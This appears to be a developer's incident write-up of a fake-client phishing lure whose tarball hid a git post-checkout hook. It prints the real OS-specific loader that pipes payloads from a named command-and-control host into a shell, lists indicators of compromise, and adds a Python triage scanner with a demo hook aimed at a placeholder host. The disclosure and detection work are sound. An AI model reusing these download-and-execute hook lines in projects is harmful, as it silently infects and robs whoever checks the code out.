It came in through my own contact form, which is part of why it worked. Not a LinkedIn cold-open, not a recruiter blast. A filled-out intake form, with a budget line and a start date, from a man named Sergio Yatskevich at a digital-healthcare company called Luminarybrand. He wanted a web platform for pharmaceutical traceability: track every pack of medicine from the manufacturer to the pharmacy to the patient, prove it's genuine, keep regulators happy. An MVP to show government and enterprise stakeholders.
If you wanted to design bait for me specifically, it would look a lot like this. Supply-chain provenance is one of the few places where a blockchain is the right answer instead of a buzzword, because the whole point is an audit trail nobody can quietly rewrite. So I leaned in. That was the idea.
The letter that was off by one
Here is the thing I almost missed. The company was real. You can search "Luminarybrand," find a UK healthcare business, see the branding, nod, and move on. The real one lives at luminarybrands.co.uk. Sergio wrote from luminarybrand.co.uk. One missing "s" at the end.
That single character is the entire con. A made-up company falls apart the moment you Google it. A typosquat of a company that actually exists borrows that company's reputation and hands it to the attacker. Your due-diligence reflex, the quick search that's supposed to protect you, becomes the thing that reassures you.
The slow part
I replied as dOrg, said this was squarely our work, and offered the obvious next step: a call. Pick a slot, fifteen minutes, let's scope it.
He didn't take it. He wrote back to say that before we jumped on a call he wanted to give me proper context, because in his experience most teams he'd spoken to never really understood the project. Then a wall of genuinely competent product detail: manufacturers issued drug-specific licenses, every unit tagged with a UUID, ownership transferred down the chain with a full trail, a public portal where a patient can verify a pack.
I read that as a man being thorough. In hindsight it was a man keeping me off the phone and buried in documents, which is exactly where the rest of this needs you to be. These operators avoid live human contact when they can. A call is friction. A call is a face. A thread is a delivery channel.
So I did what an engineer does when a brief is this good: I engaged for real. I mapped his requirements to an on-chain design, non-transferable manufacturer licenses, UUID registration at the point of manufacture, ownership transfer as the audit log itself, a scan-the-QR verification portal for consumers. I even flagged the gap these systems always have, that a printed QR can be photographed and slapped onto a counterfeit unless you bind the code to tamper-evident packaging. By the time his payload arrived, it was landing inside a warm, technical, credible conversation. That was the whole point of the warm-up.
The handoff
Then the documents came, as a Dropbox link to a gzipped tarball: Healthcare-Medical-Supply-Plan.tar.gz.
His instructions are worth quoting almost in full, because every sentence is load-bearing. The archive, he explained, was structured to mirror a Git repository. They couldn't host it as a public repo for "security and confidentiality" reasons, so here it was as a compressed file. I should review the overview and roadmap, check the README.md for how to navigate it, and then access and sign the NDA and contract from the "NDA" branch. Once the NDA was signed, we could arrange a formal discussion.
Read that again with bad intentions and it reorganizes itself.
Why ship a tarball with its own .git directory instead of a normal hosted repo? Because a public repo exposes the hooks to GitHub's tooling and to anyone who looks, and it's one click to report. A tarball keeps the same Git machinery alive while moving it somewhere nobody is watching. The confidentiality story is just the cover for that choice.
And the NDA branch is the part I keep coming back to, because it's genuinely clever. It manufactures a normal, businesslike reason to check out one specific branch. "Sign the NDA" sounds like diligence. What it actually means, mechanically, is "run git checkout." The victim pulls his own trigger and thinks he's being professional about it.
Where the body was buried
The working tree was clean. Real-looking overview, real-looking architecture, a helpful README. Nothing you're invited to read is hostile, which is the point.
The payload was in the plumbing. A fresh clone ships only inert *.sample templates in .git/hooks. This one had live hooks and extra files sitting in there. The one that matters is post-checkout, and post-checkout is nasty for a simple reason: it runs on its own every time you switch branches. No npm install, no build, no "run the project." Switching to that NDA branch he kept pointing me at is the detonation. And because it fires on every checkout, it gets to run again and again while you poke around.
The post-checkout hook was a small stub. Its job was to call a second script in the same directory, a script wearing a .sample extension to look like more Git boilerplate. It wasn't boilerplate. It was a plain, unencrypted shell script, and this is the heart of it:
case "$platform" in
Linux)
(bash -c "wget -qO- 'https://cleverstack-ext30341.vercel.app/api/l' | sh" > /dev/null 2>&1 &)
;;
Darwin)
(bash -c "curl -s 'https://cleverstack-ext30341.vercel.app/api/m' | sh" > /dev/null 2>&1 &)
;;
MINGW*|MSYS*|CYGWIN*)
cmd.exe //c start "" powershell.exe -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c curl.exe -s https://cleverstack-ext30341.vercel.app/api/w | cmd' -WindowStyle Hidden" 2>&1 &
;;
*)
(bash -c "curl -s 'https://cleverstack-ext30341.vercel.app/api/m' | sh" > /dev/null 2>&1 &)
;;
esac
It fingerprints the OS and serves a different payload from the same host for each one: /api/l for Linux, /api/m for macOS, /api/w for Windows. Anything it doesn't recognize falls through to the macOS endpoint. Every branch pipes a remote download straight into a shell, so nothing ever lands on disk for you to look at first. The redirect to /dev/null and the trailing ampersand mean it runs silent and detached while you're still reading the README. The Windows branch is the showy one: a hidden PowerShell spawns a hidden cmd that curls the payload and pipes it into cmd, stacking "WindowStyle Hidden" twice so you never see a flicker.
The hook is just the tripwire. The actual implant is whatever those endpoints handed back, and that's the part you want to recognize, not run.
Pulling the thread
The C2 was cleverstack-ext30341.vercel.app, hosted on Vercel and, by the time I got there, permanently suspended. Live analysis was off the table, which is fine, because anything that's been on the internet leaves a trail.
urlscan came back clean, which is a good lesson on its own: a clean urlscan is not a clean bill of health, it usually just means nobody scanned it while it was breathing. VirusTotal told the real story. The domain lit up with detections (virustotal.com/gui/domain/cleverstack-ext30341.vercel.app), and the trail from there led to a sample already sitting on MalwareBazaar, reported by a researcher, in circulation since April:
SHA-256: 1bcf17ce99fc748536317f9d28fd79f103f6166c1e548c0255ede0b434314352
https://bazaar.abuse.ch/sample/1bcf17ce99fc748536317f9d28fd79f103f6166c1e548c0255ede0b434314352/
So this was never about me. I walked into the tail end of a campaign that had been running for months.
What it actually was
I'm calling this by its tradecraft rather than a confession, but the fingerprints are not subtle. This is the DPRK-linked Contagious Interview campaign, also tracked as TaskJacker, MITRE ATT&CK group G1052, in the Lazarus cluster. The pattern matches line for line: a fake client or recruiter with a real-looking front, a long warm-up that keeps you off a call and inside the documents, a "project" delivered as an archive that quietly carries a Git repo, a second-stage loader hidden in git hooks, OS-specific payloads pulled from a Vercel app, and a victim profile aimed squarely at crypto and blockchain engineers. At the end of that chain sit the two implants this group is known for: BeaverTail, a JavaScript infostealer that also acts as a loader, and InvisibleFerret, a Python backdoor that goes after credentials, browser data, keychains, and wallets.
The detail I find most instructive is how this group keeps moving the tripwire earlier in the workflow. It used to live in package.json postinstall scripts, then in .vscode/tasks.json, then in fake font files. Now it's in a git hook that fires on a plain checkout, before you've built or run a single thing. The principle generalizes: anywhere your tooling will run a script on your behalf, assume someone will eventually hide a payload there.
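Here is what the "boring habit" of looking at .git/hooks before running anything can look like when written down, as an added example that is not part of the original post and not the archive it describes. It walks an unpacked project without executing anything in it and reports the tripwire locations named above: .git/hooks (live hooks, .sample files that are not git's stock templates, and download-and-execute idioms in any hook), package.json lifecycle scripts, and .vscode/tasks.json tasks set to run on folder open. The stock-template name list, the regexes, and the demo layout (the loader.sample file name and the c2.placeholder.invalid host) are my own assumptions and constructions, not the real archive's contents.

```python
# Added triage script (not from the original post): inspect an unpacked
# "project" directory for places where tooling would run a script unasked.
import json
import os
import re

# Hooks a stock `git init` drops into .git/hooks. Assumed from current git
# releases; the exact set varies a little between versions.
STOCK_SAMPLES = {
    "applypatch-msg.sample", "commit-msg.sample", "fsmonitor-watchman.sample",
    "post-update.sample", "pre-applypatch.sample", "pre-commit.sample",
    "pre-merge-commit.sample", "pre-push.sample", "pre-rebase.sample",
    "pre-receive.sample", "prepare-commit-msg.sample", "push-to-checkout.sample",
    "sendemail-validate.sample", "update.sample",
}

# Idioms from the loader described in the post: remote fetch piped straight
# into an interpreter, hidden windows, and silence-plus-background.
SUSPICIOUS = {
    "download piped to shell": re.compile(
        r"\b(curl|wget)(\.exe)?\b[^\n]*\|\s*(bash|sh|zsh|cmd(\.exe)?|powershell(\.exe)?)\b"),
    "hidden window": re.compile(r"-WindowStyle\s+Hidden", re.IGNORECASE),
    "silenced and backgrounded": re.compile(r">\s*/dev/null\s+2>&1\s*&"),
}

# npm lifecycle scripts that run on a plain `npm install`.
AUTO_NPM_SCRIPTS = {"preinstall", "install", "postinstall", "prepare"}


def _read(path):
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def scan_text(path, text):
    """Return (path, reason) findings for the download-and-execute idioms."""
    return [(path, reason) for reason, rx in SUSPICIOUS.items() if rx.search(text)]


def scan_hooks(repo):
    """Flag anything in .git/hooks that a fresh clone would not contain."""
    hooks = os.path.join(repo, ".git", "hooks")
    findings = []
    if not os.path.isdir(hooks):
        return findings
    for name in sorted(os.listdir(hooks)):
        path = os.path.join(hooks, name)
        if not os.path.isfile(path):
            continue
        if not name.endswith(".sample"):
            findings.append((path, "live hook (fresh clones ship only *.sample)"))
        elif name not in STOCK_SAMPLES:
            findings.append((path, "non-stock .sample file in hooks dir"))
        findings.extend(scan_text(path, _read(path)))
    return findings


def scan_package_json(repo):
    """Flag npm lifecycle scripts that fire without being asked for."""
    path = os.path.join(repo, "package.json")
    text = _read(path)
    if not text:
        return []
    try:
        scripts = json.loads(text).get("scripts", {})
    except (ValueError, AttributeError):
        return [(path, "unparseable package.json")]
    hits = [(path, f"auto-running npm script '{k}'") for k in scripts if k in AUTO_NPM_SCRIPTS]
    return hits + scan_text(path, text)


def scan_vscode_tasks(repo):
    """Flag VS Code tasks configured to run when the folder is opened."""
    path = os.path.join(repo, ".vscode", "tasks.json")
    text = _read(path)
    if not text:
        return []
    findings = scan_text(path, text)
    if re.search(r'"runOn"\s*:\s*"folderOpen"', text):
        findings.append((path, "task runs on folderOpen"))
    return findings


def triage(repo):
    """All findings for an unpacked project, without executing anything in it."""
    return scan_hooks(repo) + scan_package_json(repo) + scan_vscode_tasks(repo)


def build_demo(root):
    """Construct a layout shaped like the post's tarball (contents invented here)."""
    hooks = os.path.join(root, ".git", "hooks")
    os.makedirs(hooks, exist_ok=True)
    os.makedirs(os.path.join(root, ".vscode"), exist_ok=True)
    with open(os.path.join(hooks, "pre-commit.sample"), "w") as fh:  # stock, harmless
        fh.write("#!/bin/sh\n# An example hook script.\nexit 0\n")
    with open(os.path.join(hooks, "post-checkout"), "w") as fh:  # live stub
        fh.write('#!/bin/sh\nsh "$(dirname "$0")/loader.sample"\n')
    with open(os.path.join(hooks, "loader.sample"), "w") as fh:  # disguised loader
        fh.write("#!/bin/sh\n(bash -c \"curl -s 'https://c2.placeholder.invalid/api/m' | sh\""
                 " > /dev/null 2>&1 &)\n")
    with open(os.path.join(root, "package.json"), "w") as fh:
        json.dump({"scripts": {"postinstall": "node setup.js"}}, fh)
    with open(os.path.join(root, ".vscode", "tasks.json"), "w") as fh:
        json.dump({"tasks": [{"label": "x", "type": "shell", "command": "echo hi",
                              "runOptions": {"runOn": "folderOpen"}}]}, fh)
    return root


if __name__ == "__main__":
    import sys, tempfile
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo(tempfile.mkdtemp())
    for path, reason in triage(target):
        print(f"{reason}: {path}")
```

Run it against the extracted directory before any git command touches it. If you do need to look at a branch, `git -c core.hooksPath=/dev/null checkout <branch>` points git at a hooks directory with nothing in it, so a post-checkout hook has nothing to fire from; an empty directory of your own works the same way.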
Why it nearly landed
Strip away the malware and what's left is good social engineering. The company was real enough to survive a search. The brief was tailored tightly enough to my work that engaging felt like good business. The attacker was patient, refused the call, and kept everything in writing. The decoy docs were genuinely competent. And the trigger was disguised as diligence, "sign the NDA," so that following instructions and getting infected were the same action.
What saved me was boring habit. The hooks in .git looked wrong before I ran anything, and the missing "s" gave the rest away. I never let it execute against anything I cared about.
Indicators of compromise
Persona / sender
Sergio Yatskevich
sergio.yatskevich@luminarybrand.co.uk
Typosquat: luminarybrand.co.uk (impersonates the real luminarybrands.co.uk)
Cover story: "Luminarybrand" pharma supply-chain traceability MVP
Delivery
Initial vector: website contact form
Archive: Healthcare-Medical-Supply-Plan.tar.gz (contains its own .git/)
Lure: "check out the 'NDA' branch to sign the NDA/contract"
On-host
Populated .git/hooks/ (a clean clone has only *.sample templates)
Live post-checkout hook calling a second shell script
Loader disguised with a .sample extension (plain shell)
Behavior: OS fingerprint -> fetch per-OS payload -> pipe to shell -> background + silence
Network (C2, suspended)
cleverstack-ext30341.vercel.app
/api/l Linux | /api/m macOS + default | /api/w Windows
https://www.virustotal.com/gui/domain/cleverstack-ext30341.vercel.app
Sample
SHA-256 1bcf17ce99fc748536317f9d28fd79f103f6166c1e548c0255ede0b434314352
https://bazaar.abuse.ch/sample/1bcf17ce99fc748536317f9d28fd79f103f6166c1e548c0255ede0b434314352/
Hunt post-detonation
BeaverTail (JS infostealer/loader)
InvisibleFerret (Python RAT)
A note on the victim that isn't me: luminarybrands.co.uk is a real company being impersonated, not a participant. If you publish anything from this, say so plainly, and consider telling them and the registrar about the look-alike domain.
The served payloads are not retrieved or reproduced here. Only the dead loader is shown, as a detection signature.